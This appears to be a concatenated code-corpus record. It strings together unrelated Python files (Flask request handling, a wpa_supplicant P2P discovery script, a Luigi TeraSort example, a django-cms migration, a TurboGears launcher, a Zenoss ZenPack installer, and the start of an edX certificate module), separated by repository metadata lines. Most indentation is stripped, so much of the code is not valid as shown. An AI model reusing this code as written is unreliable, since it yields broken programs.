if ctx is not None:
return ctx.app.config['MAX_CONTENT_LENGTH']
@property
def endpoint(self):
"""The endpoint that matched the request. This in combination with
:attr:`view_args` can be used to reconstruct the same or a
modified URL. If an exception happened when matching, this will
be `None`.
"""
if self.url_rule is not None:
return self.url_rule.endpoint
@property
def module(self):
"""The name of the current module if the request was dispatched
to an actual module. This is deprecated functionality, use blueprints
instead.
"""
from warnings import warn
warn(DeprecationWarning('modules were deprecated in favor of '
'blueprints. Use request.blueprint '
'instead.'), stacklevel=2)
if self._is_old_module:
return self.blueprint
@property
def blueprint(self):
"""The name of the current blueprint"""
if self.url_rule and '.' in self.url_rule.endpoint:
return self.url_rule.endpoint.rsplit('.', 1)[0]
@property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data. Otherwise this will be `None`.
The :meth:`get_json` method should be used instead.
"""
# XXX: deprecate property
return self.get_json()
def get_json(self, force=False, silent=False, cache=True):
"""Parses the incoming JSON request data and returns it. If
parsing fails the :meth:`on_json_loading_failed` method on the
request object will be invoked. By default this function will
only load the json data if the mimetype is ``application/json``
        but this can be overridden by the `force` parameter.
        :param force: if set to `True` the mimetype is ignored.
        :param silent: if set to `True` this method will fail silently
                       and return `None`.
:param cache: if set to `True` the parsed JSON data is remembered
on the request.
"""
rv = getattr(self, '_cached_json', _missing)
if rv is not _missing:
return rv
if self.mimetype != 'application/json' and not force:
return None
# We accept a request charset against the specification as
# certain clients have been using this in the past. This
# fits our general approach of being nice in what we accept
# and strict in what we send out.
request_charset = self.mimetype_params.get('charset')
try:
data = _get_data(self, cache)
if request_charset is not None:
rv = json.loads(data, encoding=request_charset)
else:
rv = json.loads(data)
except ValueError as e:
if silent:
rv = None
else:
rv = self.on_json_loading_failed(e)
if cache:
self._cached_json = rv
return rv
def on_json_loading_failed(self, e):
"""Called if decoding of the JSON data failed. The return value of
this method is used by :meth:`get_json` when an error occurred. The
default implementation just raises a :class:`BadRequest` exception.
.. versionchanged:: 0.10
Removed buggy previous behavior of generating a random JSON
response. If you want that behavior back you can trivially
add it by subclassing.
.. versionadded:: 0.8
"""
raise BadRequest()
def _load_form_data(self):
RequestBase._load_form_data(self)
# in debug mode we're replacing the files multidict with an ad-hoc
# subclass that raises a different error for key errors.
ctx = _request_ctx_stack.top
if ctx is not None and ctx.app.debug and \
self.mimetype != 'multipart/form-data' and not self.files:
attach_enctype_error_multidict(self)
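# Illustrative usage sketch (not part of Flask itself): how the get_json() helper defined
# above is typically called from a view function. The app and route names are hypothetical
# placeholders.
#
#     from flask import Flask, request, jsonify
#
#     app = Flask(__name__)
#
#     @app.route('/echo', methods=['POST'])
#     def echo():
#         payload = request.get_json(silent=True)   # None if the body is not valid JSON
#         if payload is None:
#             return jsonify(error='expected application/json'), 400
#         return jsonify(payload)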
class Response(ResponseBase):
"""The response object that is used by default in Flask. Works like the
response object from Werkzeug but is set to have an HTML mimetype by
default. Quite often you don't have to create this object yourself because
:meth:`~flask.Flask.make_response` will take care of that for you.
If you want to replace the response object used you can subclass this and
set :attr:`~flask.Flask.response_class` to your subclass.
"""
default_mimetype = 'text/html'
|
apache-2.0
|
execunix/vinos
|
external/bsd/wpa/dist/wpa_supplicant/examples/p2p/p2p_find.py
|
29
|
4714
|
#!/usr/bin/python
# Tests p2p_find
# Will list all devices found/lost within a time frame (timeout)
# Then the program will exit
######### MAY NEED TO RUN AS SUDO #############
import dbus
import sys, os
import time
import gobject
import threading
import getopt
from dbus.mainloop.glib import DBusGMainLoop
def usage():
print "Usage:"
print " %s -i <interface_name> [-t <timeout>] \ " \
% sys.argv[0]
print " [-w <wpas_dbus_interface>]"
print "Options:"
print " -i = interface name"
print " -t = timeout = 0s (infinite)"
print " -w = wpas dbus interface = fi.w1.wpa_supplicant1"
print "Example:"
print " %s -i wlan0 -t 10" % sys.argv[0]
# Required Signals
def deviceFound(devicepath):
print "Device found: %s" % (devicepath)
def deviceLost(devicepath):
print "Device lost: %s" % (devicepath)
class P2P_Find (threading.Thread):
# Needed Variables
global bus
global wpas_object
global interface_object
global p2p_interface
global interface_name
global wpas
global wpas_dbus_interface
global timeout
global path
# Dbus Paths
global wpas_dbus_opath
global wpas_dbus_interfaces_opath
global wpas_dbus_interfaces_interface
global wpas_dbus_interfaces_p2pdevice
# Constructor
def __init__(self,interface_name,wpas_dbus_interface,timeout):
# Initializes variables and threads
self.timeout = int(timeout)
self.interface_name = interface_name
self.wpas_dbus_interface = wpas_dbus_interface
		# Initializes the thread; daemon mode allows ctrl-c to kill it
threading.Thread.__init__(self)
self.daemon = True
# Generating interface/object paths
self.wpas_dbus_opath = "/" + \
self.wpas_dbus_interface.replace(".","/")
		self.wpas_dbus_interfaces_opath = self.wpas_dbus_opath + \
"/Interfaces"
self.wpas_dbus_interfaces_interface = \
self.wpas_dbus_interface + ".Interface"
self.wpas_dbus_interfaces_p2pdevice = \
self.wpas_dbus_interfaces_interface \
+ ".P2PDevice"
# Getting interfaces and objects
DBusGMainLoop(set_as_default=True)
self.bus = dbus.SystemBus()
self.wpas_object = self.bus.get_object(
self.wpas_dbus_interface,
self.wpas_dbus_opath)
self.wpas = dbus.Interface(self.wpas_object,
self.wpas_dbus_interface)
# Try to see if supplicant knows about interface
# If not, throw an exception
try:
self.path = self.wpas.GetInterface(
self.interface_name)
except dbus.DBusException, exc:
error = 'Error:\n Interface ' + self.interface_name \
+ ' was not found'
print error
usage()
os._exit(0)
self.interface_object = self.bus.get_object(
self.wpas_dbus_interface, self.path)
self.p2p_interface = dbus.Interface(self.interface_object,
self.wpas_dbus_interfaces_p2pdevice)
#Adds listeners for find and lost
self.bus.add_signal_receiver(deviceFound,
dbus_interface=self.wpas_dbus_interfaces_p2pdevice,
signal_name="DeviceFound")
self.bus.add_signal_receiver(deviceLost,
dbus_interface=self.wpas_dbus_interfaces_p2pdevice,
signal_name="DeviceLost")
# Sets up p2p_find
P2PFindDict = dbus.Dictionary(
{'Timeout':int(self.timeout)})
self.p2p_interface.Find(P2PFindDict)
# Run p2p_find
def run(self):
# Allows other threads to keep working while MainLoop runs
# Required for timeout implementation
gobject.MainLoop().get_context().iteration(True)
gobject.threads_init()
gobject.MainLoop().run()
if __name__ == "__main__":
# Defaults for optional inputs
timeout = 0
wpas_dbus_interface = 'fi.w1.wpa_supplicant1'
# interface_name is required
interface_name = None
# Using getopts to handle options
try:
options, args = getopt.getopt(sys.argv[1:],"hi:t:w:")
except getopt.GetoptError:
usage()
quit()
	# If there's a switch, override default option
for key, value in options:
# Help
if (key == "-h"):
usage()
quit()
# Interface Name
elif (key == "-i"):
interface_name = value
# Timeout
elif (key == "-t"):
if ( int(value) >= 0):
timeout = value
else:
print "Error:\n Timeout cannot be negative"
usage()
quit()
# Dbus interface
elif (key == "-w"):
wpas_dbus_interface = value
else:
assert False, "unhandled option"
# Interface name is required and was not given
if (interface_name == None):
print "Error:\n interface_name is required"
usage()
quit()
# Constructor
try:
p2p_find_test = P2P_Find(interface_name, wpas_dbus_interface, timeout)
except:
print "Error:\n Invalid wpas_dbus_interface"
usage()
quit()
# Start P2P_Find
p2p_find_test.start()
try:
# If timeout is 0, then run forever
if (timeout == 0):
while(True):
pass
# Else sleep for (timeout)
else:
time.sleep(p2p_find_test.timeout)
except:
pass
quit()
|
apache-2.0
|
moandcompany/luigi
|
examples/terasort.py
|
59
|
3445
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import luigi
import luigi.contrib.hadoop_jar
import luigi.contrib.hdfs
logger = logging.getLogger('luigi-interface')
def hadoop_examples_jar():
config = luigi.configuration.get_config()
examples_jar = config.get('hadoop', 'examples-jar')
if not examples_jar:
logger.error("You must specify hadoop:examples-jar in luigi.cfg")
        raise RuntimeError("hadoop:examples-jar is not set in luigi.cfg")
if not os.path.exists(examples_jar):
logger.error("Can't find example jar: " + examples_jar)
        raise RuntimeError("Can't find example jar: " + examples_jar)
return examples_jar
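# Illustrative sketch (not part of the original example): hadoop_examples_jar() reads the
# [hadoop] section of luigi.cfg, so a minimal configuration would look roughly like the
# following. The jar path is a hypothetical placeholder for your Hadoop distribution.
#
#     [hadoop]
#     examples-jar: /usr/lib/hadoop-mapreduce/hadoop-mapreduce-examples.jar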
DEFAULT_TERASORT_IN = '/tmp/terasort-in'
DEFAULT_TERASORT_OUT = '/tmp/terasort-out'
class TeraGen(luigi.contrib.hadoop_jar.HadoopJarJobTask):
"""
Runs TeraGen, by default with 1TB of data (10B records)
"""
records = luigi.Parameter(default="10000000000",
description="Number of records, each record is 100 Bytes")
terasort_in = luigi.Parameter(default=DEFAULT_TERASORT_IN,
description="directory to store terasort input into.")
def output(self):
"""
Returns the target output for this task.
In this case, a successful execution of this task will create a file in HDFS.
:return: the target output for this task.
:rtype: object (:py:class:`~luigi.target.Target`)
"""
return luigi.contrib.hdfs.HdfsTarget(self.terasort_in)
def jar(self):
return hadoop_examples_jar()
def main(self):
return "teragen"
def args(self):
        # First arg is the record count (10B by default) -- each record is 100 bytes
return [self.records, self.output()]
class TeraSort(luigi.contrib.hadoop_jar.HadoopJarJobTask):
"""
    Runs TeraSort on the data generated by TeraGen.
"""
terasort_in = luigi.Parameter(default=DEFAULT_TERASORT_IN,
description="directory to store terasort input into.")
terasort_out = luigi.Parameter(default=DEFAULT_TERASORT_OUT,
description="directory to store terasort output into.")
def requires(self):
"""
This task's dependencies:
* :py:class:`~.TeraGen`
:return: object (:py:class:`luigi.task.Task`)
"""
return TeraGen(terasort_in=self.terasort_in)
def output(self):
"""
Returns the target output for this task.
In this case, a successful execution of this task will create a file in HDFS.
:return: the target output for this task.
:rtype: object (:py:class:`~luigi.target.Target`)
"""
return luigi.contrib.hdfs.HdfsTarget(self.terasort_out)
def jar(self):
return hadoop_examples_jar()
def main(self):
return "terasort"
def args(self):
return [self.input(), self.output()]
if __name__ == '__main__':
luigi.run()
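# Illustrative invocation sketch (not part of the original example): assuming the luigi.cfg
# shown earlier and a reachable Hadoop cluster, the TeraSort task (and its TeraGen dependency)
# could be launched with a smaller record count for testing. The exact flags and module path
# depend on your setup and are assumptions, not fixed values.
#
#     python terasort.py TeraSort --local-scheduler --TeraGen-records 1000000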
|
apache-2.0
|
intgr/django-cms
|
cms/migrations/0045_auto__add_field_page_application_urls.py
|
15
|
16500
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.module_name)
user_ptr_name = '%s_ptr' % User._meta.object_name.lower()
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Page.application_urls'
db.add_column(u'cms_page', 'application_urls',
self.gf('django.db.models.fields.CharField')(db_index=True, max_length=200, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Page.application_urls'
db.delete_column(u'cms_page', 'application_urls')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': User.__name__, 'db_table': "'%s'" % User._meta.db_table},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.globalpagepermission': {
'Meta': {'object_name': 'GlobalPagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_recover_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.page': {
'Meta': {'ordering': "('tree_id', 'lft')", 'object_name': 'Page'},
'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'revision_id': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.pagemoderatorstate': {
'Meta': {'ordering': "('page', 'action', '-created')", 'object_name': 'PageModeratorState'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True'})
},
'cms.pagepermission': {
'Meta': {'object_name': 'PagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'grant_on': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.pageuser': {
'Meta': {'object_name': 'PageUser', '_ormbases': [user_orm_label]},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_users'", 'to': "orm['%s']" % user_orm_label}),
u'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['%s']" % user_orm_label, 'unique': 'True', 'primary_key': 'True'})
},
'cms.pageusergroup': {
'Meta': {'object_name': 'PageUserGroup', '_ormbases': [u'auth.Group']},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_usergroups'", 'to': "orm['%s']" % user_orm_label}),
u'group_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.Group']", 'unique': 'True', 'primary_key': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cms.title': {
'Meta': {'unique_together': "(('language', 'page'),)", 'object_name': 'Title'},
'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'has_url_overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'max_length': '155', 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
'page_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'redirect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'cms.usersettings': {
'Meta': {'object_name': 'UserSettings'},
'clipboard': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['cms']
|
bsd-3-clause
|
izak/xhtml2pdf
|
demo/tgpisa/tgpisa/commands.py
|
155
|
1630
|
# -*- coding: utf-8 -*-
"""This module contains functions called from console script entry points."""
import os
import sys
from os.path import dirname, exists, join
import pkg_resources
pkg_resources.require("TurboGears")
import turbogears
import cherrypy
cherrypy.lowercase_api = True
class ConfigurationError(Exception):
pass
def start():
"""Start the CherryPy application server."""
setupdir = dirname(dirname(__file__))
curdir = os.getcwd()
# First look on the command line for a desired config file,
# if it's not on the command line, then look for 'setup.py'
# in the current directory. If there, load configuration
# from a file called 'dev.cfg'. If it's not there, the project
# is probably installed and we'll look first for a file called
# 'prod.cfg' in the current directory and then for a default
# config file called 'default.cfg' packaged in the egg.
if len(sys.argv) > 1:
configfile = sys.argv[1]
elif exists(join(setupdir, "setup.py")):
configfile = join(setupdir, "dev.cfg")
elif exists(join(curdir, "prod.cfg")):
configfile = join(curdir, "prod.cfg")
else:
try:
configfile = pkg_resources.resource_filename(
pkg_resources.Requirement.parse("tgpisa"),
"config/default.cfg")
except pkg_resources.DistributionNotFound:
raise ConfigurationError("Could not find default configuration.")
turbogears.update_config(configfile=configfile,
modulename="tgpisa.config")
from tgpisa.controllers import Root
turbogears.start_server(Root())
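# Illustrative sketch (not part of the original module): start() is meant to be exposed as a
# console script, so the project's setup.py would typically declare an entry point roughly
# like the one below. The script name is a hypothetical choice.
#
#     entry_points="""
#     [console_scripts]
#     start-tgpisa = tgpisa.commands:start
#     """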
|
apache-2.0
|
anksp21/Community-Zenpacks
|
ZenPacks.community.zenAppProfiler/ZenPacks/community/zenAppProfiler/__init__.py
|
2
|
5384
|
import Globals
import os.path
skinsDir = os.path.join(os.path.dirname(__file__), 'skins')
from Products.CMFCore.DirectoryView import registerDirectory
if os.path.isdir(skinsDir):
registerDirectory(skinsDir, globals())
import transaction
from Products.ZenModel.ZenossInfo import ZenossInfo
from Products.ZenModel.ZenPack import ZenPackBase
from Products.ZenModel.ZenMenu import ZenMenu
class ZenPack(ZenPackBase):
""" ZenPack loader
"""
profilerTab = { 'id' : 'profileorganizer'
, 'name' : 'Profiles'
, 'action' : 'Profiles/viewProfileOrganizer'
, 'permissions' : ( "Manage DMD", )
}
def addProfilerTab(self,app):
dmdloc = self.dmd
finfo = dmdloc.factory_type_information
actions = list(finfo[0]['actions'])
for i in range(len(actions)):
if (self.profilerTab['id'] in actions[i].values()):
return
actions.append(self.profilerTab)
finfo[0]['actions'] = tuple(actions)
dmdloc.factory_type_information = finfo
transaction.commit()
def rmvProfilerTab(self,app):
dmdloc = self.dmd
finfo = dmdloc.factory_type_information
actions = list(finfo[0]['actions'])
for i in range(len(actions)):
if (self.profilerTab['id'] in actions[i].values()):
actions.remove(self.profilerTab)
finfo[0]['actions'] = tuple(actions)
dmdloc.factory_type_information = finfo
transaction.commit()
def installMenus(self,app):
dmdloc = self.dmd
self.removeMenus(dmdloc)
modulemenu = ZenMenu('ModuleMenu')
dmdloc.zenMenus._setObject(modulemenu.id, modulemenu)
modulemenu = dmdloc.zenMenus._getOb(modulemenu.id)
modulemenu.manage_addZenMenuItem('addModule',
action='dialog_addModule', # page template that is called
description='Add Ruleset',
ordering=4.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('removeModule',
action='dialog_removeModule', # page template that is called
description='Remove Ruleset',
ordering=3.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('runAllMembershipRules',
action='dialog_runAllMembershipRules', # page template that is called
description='Build All Memberships',
ordering=2.0,
isdialog=True)
modulemenu = ZenMenu('RuleDefinitions')
dmdloc.zenMenus._setObject(modulemenu.id, modulemenu)
modulemenu = dmdloc.zenMenus._getOb(modulemenu.id)
modulemenu.manage_addZenMenuItem('addRule',
action='dialog_addRule', # page template that is called
description='Add Rule',
ordering=4.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('removeRule',
action='dialog_removeRule', # page template that is called
description='Remove Rule',
ordering=3.0,
isdialog=True)
modulemenu = ZenMenu('RuleModule')
dmdloc.zenMenus._setObject(modulemenu.id, modulemenu)
modulemenu = dmdloc.zenMenus._getOb(modulemenu.id)
modulemenu.manage_addZenMenuItem('runAllMembershipRules',
action='dialog_runModuleMembershipRules', # page template that is called
description='Build Memberships',
ordering=2.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('buildAlerts',
action='dialog_buildModuleAlerts', # page template that is called
description='Build Alerts',
ordering=1.0,
isdialog=True)
def removeMenus(self, dmd):
try:
self.dmd.zenMenus._delObject('ModuleMenu')
except AttributeError:
pass
try:
self.dmd.zenMenus._delObject('RuleDefinitions')
except AttributeError:
pass
try:
self.dmd.zenMenus._delObject('RuleModule')
except AttributeError:
pass
def install(self, app):
ZenPackBase.install(self, app)
self.addProfilerTab(app)
self.installMenus(app.zport.dmd)
def upgrade(self, app):
ZenPackBase.upgrade(self, app)
self.addProfilerTab(app)
self.installMenus(app.zport.dmd)
def remove(self, app, junk):
self.rmvProfilerTab(app)
self.dmd._delObject('Profiles')
self.removeMenus(self.zport.dmd)
#ZenPackBase.remove(self, app, junk)
#ZenPackBase.remove(self.app, leaveObjects)
|
gpl-2.0
|
eduNEXT/edx-platform
|
lms/djangoapps/certificates/generation.py
|
2
|
6695
|
"""
Course certificate generation
These methods generate course certificates (they create a new course certificate if one does not yet exist, or update the
existing cert if one already exists).
For now, these methods deal primarily with allowlist certificates, and are part of the V2 certificates revamp.
These methods should be called from tasks.
"""
import logging
from uuid import uuid4
from common.djangoapps.student.models import CourseEnrollment, UserProfile
from lms.djangoapps.certificates.data import CertificateStatuses
from lms.djangoapps.certificates.models import GeneratedCertificate
from lms.djangoapps.certificates.queue import XQueueCertInterface
from lms.djangoapps.certificates.utils import (
emit_certificate_event,
has_html_certificates_enabled
)
from lms.djangoapps.grades.api import CourseGradeFactory
